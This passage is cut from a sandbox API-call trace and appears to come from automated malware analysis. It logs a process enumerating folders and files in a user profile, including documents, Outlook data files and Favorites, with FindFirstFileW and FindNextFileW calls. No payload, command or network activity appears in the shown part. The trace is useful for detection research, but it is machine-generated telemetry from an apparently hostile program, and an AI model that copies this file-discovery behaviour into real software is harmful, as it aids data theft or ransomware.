hHeap=0xcd0000) returned 1 [0165.836] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.836] PathFindFileNameW (pszPath="") returned="" [0165.836] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3392880, ftCreationTime.dwHighDateTime=0x1d5e5d5, ftLastAccessTime.dwLowDateTime=0x8ac14960, ftLastAccessTime.dwHighDateTime=0x1d5d9c7, ftLastWriteTime.dwLowDateTime=0x8ac14960, ftLastWriteTime.dwHighDateTime=0x1d5d9c7, nFileSizeHigh=0x0, nFileSizeLow=0x9a1a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wsTyr.mkv", cAlternateFileName="")) returned 0xffffffff [0165.837] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2d68 | out: hHeap=0xcd0000) returned 1 [0165.837] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bc0 | out: hHeap=0xcd0000) returned 1 [0165.837] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0165.837] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.837] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="My Pictures\\" [0165.837] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0165.837] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.837] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.837] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9f8 | out: hHeap=0xcd0000) returned 1 [0165.837] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.837] PathFindFileNameW (pszPath="") returned="" [0165.837] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3392880, ftCreationTime.dwHighDateTime=0x1d5e5d5, ftLastAccessTime.dwLowDateTime=0x8ac14960, ftLastAccessTime.dwHighDateTime=0x1d5d9c7, ftLastWriteTime.dwLowDateTime=0x8ac14960, ftLastWriteTime.dwHighDateTime=0x1d5d9c7, nFileSizeHigh=0x0, nFileSizeLow=0x9a1a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wsTyr.mkv", cAlternateFileName="")) returned 0xffffffff [0165.837] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2d68 | out: hHeap=0xcd0000) returned 1 [0165.837] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bc0 | out: hHeap=0xcd0000) returned 1 [0165.837] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0165.838] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.838] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="My Shapes\\" [0165.838] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0165.838] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.838] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.838] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9f8 | out: hHeap=0xcd0000) returned 1 [0165.838] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.838] PathFindFileNameW (pszPath="") returned="" [0165.838] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.839] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2d68 | out: hHeap=0xcd0000) returned 1 [0165.839] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.839] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0165.839] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0165.839] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1 [0165.839] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0 [0165.839] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.839] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bc0 | out: hHeap=0xcd0000) returned 1 [0165.839] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0165.839] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.840] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="My Videos\\" [0165.840] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0165.840] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.840] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.840] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9f8 | out: hHeap=0xcd0000) returned 1 [0165.840] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.840] PathFindFileNameW (pszPath="") returned="" [0165.840] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0xffffffff [0165.840] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2d68 | out: hHeap=0xcd0000) returned 1 [0165.840] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bc0 | out: hHeap=0xcd0000) returned 1 [0165.840] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0165.840] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.840] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\") returned="NsI7Q_Ai4cQKUwAhGA5\\" [0165.840] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0165.840] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.840] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.840] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9f8 | out: hHeap=0xcd0000) returned 1 [0165.841] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.841] PathFindFileNameW (pszPath="") returned="" [0165.841] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf8472fb0, ftCreationTime.dwHighDateTime=0x1d5e820, ftLastAccessTime.dwLowDateTime=0xfc59de90, ftLastAccessTime.dwHighDateTime=0x1d5e019, ftLastWriteTime.dwLowDateTime=0xfc59de90, ftLastWriteTime.dwHighDateTime=0x1d5e019, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.841] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee10 | out: hHeap=0xcd0000) returned 1 [0165.841] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf8472fb0, ftCreationTime.dwHighDateTime=0x1d5e820, ftLastAccessTime.dwLowDateTime=0xfc59de90, ftLastAccessTime.dwHighDateTime=0x1d5e019, ftLastWriteTime.dwLowDateTime=0xfc59de90, ftLastWriteTime.dwHighDateTime=0x1d5e019, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.841] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d450f60, ftCreationTime.dwHighDateTime=0x1d5e68a, ftLastAccessTime.dwLowDateTime=0xdcdab6e0, ftLastAccessTime.dwHighDateTime=0x1d5e477, ftLastWriteTime.dwLowDateTime=0xdcdab6e0, ftLastWriteTime.dwHighDateTime=0x1d5e477, nFileSizeHigh=0x0, nFileSizeLow=0x4bed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4Dln-6B2CH3Hg4kDacAD.ods", cAlternateFileName="4DLN-6~1.ODS")) returned 1 [0165.841] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc160130, ftCreationTime.dwHighDateTime=0x1d5dec7, ftLastAccessTime.dwLowDateTime=0xa39ecb60, ftLastAccessTime.dwHighDateTime=0x1d5e00c, ftLastWriteTime.dwLowDateTime=0xa39ecb60, ftLastWriteTime.dwHighDateTime=0x1d5e00c, nFileSizeHigh=0x0, nFileSizeLow=0xa7a7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GhDa.ppt", cAlternateFileName="")) returned 1 [0165.841] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5e9c560, ftCreationTime.dwHighDateTime=0x1d5e148, ftLastAccessTime.dwLowDateTime=0x6fdd2420, ftLastAccessTime.dwHighDateTime=0x1d5e237, ftLastWriteTime.dwLowDateTime=0x6fdd2420, ftLastWriteTime.dwHighDateTime=0x1d5e237, nFileSizeHigh=0x0, nFileSizeLow=0x160e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qd9fmjYwbt.pdf", cAlternateFileName="QD9FMJ~1.PDF")) returned 1 [0165.841] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42daaf40, ftCreationTime.dwHighDateTime=0x1d5e21b, ftLastAccessTime.dwLowDateTime=0x3839eae0, ftLastAccessTime.dwHighDateTime=0x1d5dc28, ftLastWriteTime.dwLowDateTime=0x3839eae0, ftLastWriteTime.dwHighDateTime=0x1d5dc28, nFileSizeHigh=0x0, nFileSizeLow=0x18d25, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Wha9_.rtf", cAlternateFileName="")) returned 1 [0165.841] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe327b4f0, ftCreationTime.dwHighDateTime=0x1d5d8b8, ftLastAccessTime.dwLowDateTime=0xe2d6bcf0, ftLastAccessTime.dwHighDateTime=0x1d5dd25, ftLastWriteTime.dwLowDateTime=0xe2d6bcf0, ftLastWriteTime.dwHighDateTime=0x1d5dd25, nFileSizeHigh=0x0, nFileSizeLow=0x160c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z91WTiE9.odt", cAlternateFileName="")) returned 1 [0165.841] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51ed9480, ftCreationTime.dwHighDateTime=0x1d5db0d, ftLastAccessTime.dwLowDateTime=0xb3065130, ftLastAccessTime.dwHighDateTime=0x1d5e4ef, ftLastWriteTime.dwLowDateTime=0xb3065130, ftLastWriteTime.dwHighDateTime=0x1d5e4ef, nFileSizeHigh=0x0, nFileSizeLow=0x58c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZpJC_.pptx", cAlternateFileName="ZPJC_~1.PPT")) returned 1 [0165.841] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdfd2b8a0, ftCreationTime.dwHighDateTime=0x1d5da9c, ftLastAccessTime.dwLowDateTime=0x98009a80, ftLastAccessTime.dwHighDateTime=0x1d5e71a, ftLastWriteTime.dwLowDateTime=0x98009a80, ftLastWriteTime.dwHighDateTime=0x1d5e71a, nFileSizeHigh=0x0, nFileSizeLow=0x4001, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZRKlkyH3Jmyg3Y7.pps", cAlternateFileName="ZRKLKY~1.PPS")) returned 1 [0165.841] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8f35e6c0, ftCreationTime.dwHighDateTime=0x1d5de97, ftLastAccessTime.dwLowDateTime=0x4cee7030, ftLastAccessTime.dwHighDateTime=0x1d5dab8, ftLastWriteTime.dwLowDateTime=0x4cee7030, ftLastWriteTime.dwHighDateTime=0x1d5dab8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZSqKO4y-pgVGUfXDhW", cAlternateFileName="ZSQKO4~1")) returned 1 [0165.841] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8f35e6c0, ftCreationTime.dwHighDateTime=0x1d5de97, ftLastAccessTime.dwLowDateTime=0x4cee7030, ftLastAccessTime.dwHighDateTime=0x1d5dab8, ftLastWriteTime.dwLowDateTime=0x4cee7030, ftLastWriteTime.dwHighDateTime=0x1d5dab8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZSqKO4y-pgVGUfXDhW", cAlternateFileName="ZSQKO4~1")) returned 0 [0165.841] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.842] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bc0 | out: hHeap=0xcd0000) returned 1 [0165.842] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed88 | out: hHeap=0xcd0000) returned 1 [0165.842] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.842] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="Outlook Files\\" [0165.842] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0165.842] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.842] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.842] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9f8 | out: hHeap=0xcd0000) returned 1 [0165.842] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.842] PathFindFileNameW (pszPath="") returned="" [0165.842] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.848] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2b10 | out: hHeap=0xcd0000) returned 1 [0165.848] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.848] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0165.848] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0 [0165.848] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.848] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bc0 | out: hHeap=0xcd0000) returned 1 [0165.848] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2a20 | out: hHeap=0xcd0000) returned 1 [0165.848] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.848] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="Links\\" [0165.848] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0165.849] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.849] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.849] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9f8 | out: hHeap=0xcd0000) returned 1 [0165.849] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.849] PathFindFileNameW (pszPath="") returned="" [0165.849] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.849] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0165.849] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.849] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0165.849] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Suggested Sites.url", cAlternateFileName="SUGGES~1.URL")) returned 1 [0165.849] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0165.849] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0165.849] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.849] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bc0 | out: hHeap=0xcd0000) returned 1 [0165.849] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71930 | out: hHeap=0xcd0000) returned 1 [0165.850] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.850] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="Microsoft Websites\\" [0165.850] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0165.850] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS 